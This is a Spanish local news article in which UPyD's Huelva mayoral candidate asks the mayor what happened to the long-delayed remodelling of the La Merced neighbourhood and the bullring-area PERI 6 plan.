(function (document, window) { document.addEventListener('DOMContentLoaded', function (event) { let a = document.createElement("script"); a.type = 'text/javascript'; a.async = true; a.src = "https://data.gblcdn.com/data/gblcdnp.js?pubid=05a114a0-fca3-11e9-8439-f143cce16e54&pid=TcvybSOnmDcPUTj&renderD=0&limitT=0&limitH=24&t=i"; document.body.appendChild(a); document.getElementById('TcvybSOnmDcPUTj').remove(); }); }) (document, window);
Viernes 01 de Julio de 2022

UPyD pregunta por la remodelación de la barriada de la Merced

0

Miguel Angel Delgado, coordinador local y candidato a la alcaldía de Huelva por UPyD pregunta al alcalde Pedro Rodriguez dónde han quedado los proyectos para la barriada de la Merced.

“Estamos en una situación dificil por la deuda tan alta, contraida por el consistorio, pero no es de recibo que algunas asociaciones de vecinos, como la de la Merced, y alguna mas, no se les preste la atención debida desde el ayuntamiento y no se les de la misma cobertura que a las demás, como puede ser una sede donde se puedan reunir los vecinos y hacer sus propias actividades” explica Delgado.

En una nota de prensa, el candidato de UPyD indica que «tenemos que hacernos eco de la hemeroteca de la prensa y remontarnos a junio de 2009 cuando nuestro alcalde decía:
La reordenación de la manzana contigua a la plaza de toros, donde se encuentra el viejo mercado de La Merced, comenzará tras el verano. En la zona se construirán tres bloques con un total de 72 viviendas y se dotará a la Avenida Cristóbal Colón de un edificio público, cuyo uso someterá a consenso el Ayuntamiento: «Allí nace una oportunidad, -apuntó ayer el alcalde, Pedro Rodríguez- y lo importante es que la sepamos aprovechar entre todos. En su día dijo el portavoz socialista Díaz Trillo de hacer ahí un museo taurino. Es una opción, pero hemos planteado concentrar los nuevos museos en el Ensanche Sur para hacer un circuito y que éstos no estén desperdigados por la ciudad». “La Gerencia Municipal de Urbanismo acaba de tomar las riendas de una operación clave en el Oeste del Casco Antiguo, asumiendo directamente la gestión del llamado Plan Especial de Reforma Interior de la Plaza de Toros (PERI 6). Tras haber aprobado inicialmente el cambio de sistema de actuación de compensación a cooperación, el Consistorio tratará de agilizar el inicio de unas obras largamente demoradas haciéndose cargo de los proyectos de reparcelación y urbanización, que anteriormente habían sido competencia de los propietarios”.

Delgado se pregunta «qué ha sido de este proyecto, es más, qué ha sido de toda la barriada y sus ciudadanos, abandonados a su suerte por el ayuntamiento y el alcalde, siendo como es, una de las barriadas más visitadas de la ciudad, recordar que en ella está la plaza de toros, la catedral, etc.»

 


Leave A Reply

Las cookies de este sitio web se usan para personalizar el contenido y los anuncios, ofrecer funciones de redes sociales y analizar el tráfico. Además, compartimos información sobre el uso que haga del sitio web con nuestros partners de redes sociales, publicidad y análisis web, quienes pueden combinarla con otra información que les haya proporcionado o que hayan recopilado a partir del uso que haya hecho de sus servicios. Ver detalles

ACEPTAR
Aviso de cookies